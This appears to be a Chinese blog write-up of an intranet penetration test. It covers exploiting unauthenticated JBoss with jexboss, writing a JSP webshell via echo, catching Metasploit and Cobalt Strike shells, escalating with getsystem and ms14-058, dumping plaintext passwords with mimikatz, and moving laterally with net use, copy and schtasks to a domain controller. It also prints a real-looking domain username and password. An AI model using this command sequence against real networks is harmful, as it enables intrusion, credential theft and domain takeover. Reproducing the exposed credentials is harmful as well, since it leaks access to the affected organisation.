一次内网实战记录

公网JBoss getshell

JBoss未授权访问，进入JBoss管理控制台可以通过加载远程的war来部署木马。

可以手工写入webshell，但是我使用手测出报错。

可以使用下面的exp，jexboss还是非常好用的，可以反弹msf，也可以代理模式运行。

https://github.com/joaomatosf/jexboss.git

通过jexboss成功执行getshell，但是这里想要能够进行文件上传等操作，所以还是需要一个webshell。可以使用echo命令将webshell写到jboss的web目录下。可以从jmx控制台找到这个web目录。

echo [写入的内容] >> C:/Portals/JBoss/jboss-6.1.0.Final/common/deploy/jmx-console.war/1.jsp

注意：

echo命令如果遇到特殊符号如< 、>需要在其前面加一个^表示转义。

有未授权的jboss版本较低，相对应的java版本也可能较低，尽量使用哥斯拉的jsp一句话木马。冰蝎木马在实测中可能会无法运行。

测试过程中，使用jexboss执行命令之后，文件一直都访问不到。所幸jexboss提供反弹shell给msf的功能。

msf设置好监听，在jexboss提供的shell中输入如下命令即可。

jexremote=ip:port

在msf的shell中写入文件成功，添加到哥斯拉。

淦，虽然哥斯拉连上了webshell，执行命令却返回一堆乱码，不过好在还有msf的shell在。

查看系统的相关信息

whoami mysql\mysql
systeminfo windows7 x64
tasklist 查看进程在线杀软对比一下，这台机器没有杀软

ok了解到上面的相关信息后，就可以进行cs上线了。虽说没有杀软还是小做了一下免杀哈。哥斯拉文件上传配合msf执行，成功CS上线，现在算是进入内网了。

域渗透
本机提权

在CS上线后，在这里做的第一件事情是提权。低权限级别可能在后续的一些测试中受到限制，所以需要尽可能的提权。

当前上线的用户为mysql\mysql，这个用户是在本地管理员组的，其实权限已经很大了，但是还是希望可以提权到SYSTEM级别。

这里通过派生会话给MSF，使用getsystem提权成功。

再通过MSF执行之前上传的CS木马，即可system上线。当然提权成不成功也不要紧，我们还可以以此服务器攻击其他服务机器。

内网信息收集

有了第一台内网机器的权限后，下一步就是很关键的信息收集。

首先要查看当前机器的系统信息、本机的网络环境、收集域内的相关信息，包括所有的计算机、以及一些组信息，下面列出了一些常用的命令和作用。当然也可以借助CS插件和一些工具对内网进行扫描来收集信息，例如fscan、cs插件巨龙拉冬。

ipconfig、systeminfo、
net view /domain 查看有几个域
net user /domain 查看域用户
net view /domain[:domain_name] 查询指定域内的机器
net group /domain 查询域里的组
net group “group_name” /domain 查询域内指定组的用户
eg:net group “domain admins” 查询域管理员
net group "domain computers"查询域内所有主机名
（这里的组名和操作系统语言有关系）

内网中有几个域

查询INTEGRAL域内主机，这里我们已经看到了机器名为INTAD的机器，应该就是域控了。

查询内网主机名和扫描内网存活主机

同时这台机器是windows7的机器，并且没打补丁，所以可以使用mimikatz抓取明文密码。

但是由于这台机器位于工作组内，接下来的首要目标还是移动到域内的机器上。

内网移动
206

通过对内网的探测，发现192.168.0.206也是一台MySQL服务，同时再206上面也开开了JBoss服务，不过只能内网访问。先不管三七二十一，因为存在Jboss原因可以使用相同的方法上线206这台机器。

使用frp搭建内网穿透，上面也介绍过我们的Jexboss.py这个exp是支持代理的，只需要运行命令后面加上参数-P和代理URL即可。很快就拿到了内网第二台机器，这台机器的用户也为MySQL，同时权限也是仅是本地管理员的权限，同样也不在域内。。。还是先提权吧。

使用ms14-058成功提权到SYSTEM级别，同样的windows7系统，使用mimikiatz抓取明文密码。这里使用MySQL权限抓不到密码，在提权后抓到了明文密码。（能提权还是尽可能提权）

这里抓到了域用户的账号和密码。还是挺惊喜的。结合后面的ip判断，应该可以使用该账户登录到192.168.0.10这台机器。

这里尝试了使用ipc文件共享来传CS后门，并使用计划任务来完成CS上线

//建立ipc连接
net use \MSUKHAREV2\C$ /u:integral\dlyalin 1990IntegraL1990
//将CS后门复制到.10这台机器的共享路径
copy c:\Inbox\ctest.exe \MSUKHAREV2\C$
//查看目标当前时间
net time \MSUKHAREV2
//使用schtasks为远程计算机添加计划任务，执行Cs后门上线
schtasks /Create /SC ONCE /ST 14:13 /TN pos /TR c:\ctest.exe /S 192.168.0.10 /u integral\dlyalin /p 1990IntegraL1990

域内机器上线成功，，下面收集域内信息

查询域内组信息

查询域控制组的成员，此时发现这里用户integral\dlyalin就是域控组的成员。。。阿这。

域控getshell

前面收集信息时，已经得知域控的电脑名为INTAD，查找域控的方法也很多了，可以用nslookup查一下DNS服务区，一般DNS部署在域控上。这里直接ping一下这个名字就可以获得ip。

再次使用IPC来上传CS后门，并设置定时任务上线CS。

不过这里似乎有一些设备限制域控机器的外连，还没有执行命令就已经连不上了。这里需要使用内网上线的机器转发一个监听，再生成后门上传到域控即可上线。

上线之后可以使用CS的svc-exe来提权，即可获得sytstem级别权限。

拿到域控的权限，接下来可以直接dump域内所有用户的hash了，此时就可以畅游内网了。（偷笑）

总结

这次内网实战，首先是拿到了一台可以外网访问到的JBOSS机器进入内网；之后通过内网存在的Web应用（JBOSS）横向移动第二台机器中；在机器二中获得了域内一账号的明文密码和相应的机器IP（其实这时获得的是内网域控的账号密码他能登录域内的机器，只是当时没想到居然是域管理员的账号密码）；通过这个账号密码使用IPC入侵，上线了第三台机器；最后登录到域控机器通过提权获得了integral.local域控权限。

感谢观看！！给个关注就更好了~